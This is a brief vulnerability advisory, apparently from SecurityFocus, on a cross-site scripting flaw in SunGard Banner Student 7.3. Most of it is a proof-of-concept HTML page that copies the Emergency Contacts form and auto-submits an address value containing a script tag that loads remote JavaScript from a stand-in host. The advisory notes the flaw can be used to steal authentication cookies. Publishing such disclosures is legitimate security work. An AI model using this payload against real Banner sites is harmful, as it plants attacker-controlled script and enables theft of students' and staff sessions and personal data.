SunGard Banner Student 7.3 - 'add1' Parameter Cross-Site Scripting Vulnerability



source: http://www.securityfocus.com/bid/27490/info


Banner Student is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Banner Student 7.3 is vulnerable; other versions may also be affected. 

<html><head><title>Banner Vulnerability Test Case</title></head> <body> <FORM ACTION="https://www.example.com/ss/twbksrch.P_ShowResults" METHOD="POST"> Search <SPAN class=fieldlabeltextinvisible><LABEL for=keyword_in_id><SPAN class=fieldlabeltext>Search</SPAN></LABEL></SPAN> <INPUT TYPE="text" NAME="KEYWRD_IN" SIZE="20" MAXLENGTH="65" ID="keyword_in_id"> <INPUT TYPE="submit" VALUE="Go"> </FORM> </div> </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <SPAN class="pageheaderlinks"> <A HREF="/ss/twbkwbis.P_GenMenu?name=bmenu.P_GenMnu" class="submenulinktext2" >RETURN TO MENU</A> | <A HREF="/ss/twbksite.P_DispSiteMap?menu_name_in=bmenu.P_MainMnu&depth_in=2&columns_in=3" accesskey="2" class="submenulinktext2">SITE MAP</A> | <A HREF="/wtlhelp/twbhhelp.htm" accesskey="H" onClick="popup = window.open('/wtlhelp/twbhhelp.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status=''; return true" onMouseOut="window.status=''; return true"onFocus="window.status=''; return true" onBlur="window.status=''; return true" class="submenulinktext2">HELP</A> | <A HREF="twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A> </span> </TD> </TR> </TABLE> </DIV> <DIV class="pagetitlediv"> <TABLE CLASS="plaintable" SUMMARY="This table displays title and static header displays." WIDTH="100%"> <TR> <TD CLASS="pldefault"> <H2>Update Emergency Contacts</H2> </TD> <TD CLASS="pldefault"> &nbsp; </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <DIV class="staticheaders"> </div> </TD> </TR> <TR> <TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image" NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD> </TR> </TABLE> <a name="main_content"></a> </DIV> <DIV class="pagebodydiv"> <!-- ** END OF twbkwbis.P_OpenDoc ** --> <DIV class="infotextdiv"><TABLE CLASS="infotexttable" SUMMARY="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><TR><TD CLASS="indefault">&nbsp;</TD><TD CLASS="indefault"><SPAN class=infotext> Enter a new emergency contact. When finished, Submit Changes. </SPAN></TD></TR></TABLE><P></DIV> <FORM NAME="MyForm" ACTION="https://www.example.com:9170/ssINTG/bwgkoemr.P_UpdateEmrgContacts" METHOD="post"> <INPUT TYPE="hidden" NAME="oldpri" VALUE="2"> <INPUT TYPE="hidden" NAME="last_active" VALUE="20070821154753"> <TABLE CLASS="dataentrytable" SUMMARY="This layout table is used to format the Emergency Contacts form."> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=remove_id><SPAN class=fieldlabeltext>Remove Contact:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"><INPUT TYPE="checkbox" NAME="remove_it" ID="remove_id"></TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=priority_id><SPAN class=fieldlabeltext>Order:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="priority_in" SIZE="2" MAXLENGTH="1" VALUE="2" ID="priority_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=rship_id><SPAN class=fieldlabeltext>Relationship:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="rship" SIZE="1" ID="rship_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="A">An Ex-spouse </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=fname_id><SPAN class=fieldlabeltext>First Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="fname" SIZE="20" MAXLENGTH="15" ID="fname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=mi_id><SPAN class=fieldlabeltext>Middle Initial:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="mi" SIZE="2" MAXLENGTH="1" ID="mi_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=lname_id><SPAN class=fieldlabeltext>Last Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="lname" SIZE="35" MAXLENGTH="25" ID="lname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr1_id><SPAN class=fieldlabeltext>Address Line 1:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr1" SIZE="35" MAXLENGTH="30" ID="addr1_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr2_id><SPAN class=fieldlabeltext>Address Line 2:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr2" SIZE="35" MAXLENGTH="30" ID="addr2_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr3_id><SPAN class=fieldlabeltext>Address Line 3:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr3" SIZE="35" MAXLENGTH="30" ID="addr3_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=city_id><SPAN class=fieldlabeltext>City:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="city" SIZE="30" MAXLENGTH="20" ID="city_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=stat_id><SPAN class=fieldlabeltext>State or Province:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="stat" SIZE="1" ID="stat_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="RI">Rhode Island </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=zip_id><SPAN class=fieldlabeltext>Zip or Postal Code:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="zip" SIZE="11" MAXLENGTH="10" ID="zip_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=natn_id><SPAN class=fieldlabeltext>Country:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="natn" SIZE="1" ID="natn_id"> <OPTION VALUE="" SELECTED>Not Applicable OPTION VALUE="US">United States </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=area_id><SPAN class=fieldlabeltext>Area Code:</SPAN></LABEL></TD> <TD COLSPAN="1" CLASS="dedefault"> <INPUT TYPE="text" NAME="area" SIZE="4" MAXLENGTH="3" ID="area_id"> <TD CLASS="delabel" scope="row" ><LABEL for=phone_id><SPAN class=fieldlabeltext>Phone Number:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="phone" SIZE="9" MAXLENGTH="8" ID="phone_id"></TD> <TD CLASS="delabel" scope="row" ><LABEL for=ext_id><SPAN class=fieldlabeltext>Extension:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="ext" SIZE="5" MAXLENGTH="4" ID="ext_id"></TD> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Submit Changes"> <INPUT TYPE="reset" VALUE="Reset"> </FORM> <script> document.MyForm.addr1.value='\<script src=http://www.example2.com/s>'; document.MyForm.natn.value='US'; document.MyForm.stat.value='RI'; document.MyForm.fname.value='NAME'; document.MyForm.lname.value='NAME'; document.MyForm.city.value='Providence'; document.MyForm.zip.value='02912'; document.MyForm.submit(); </script> </body> </html>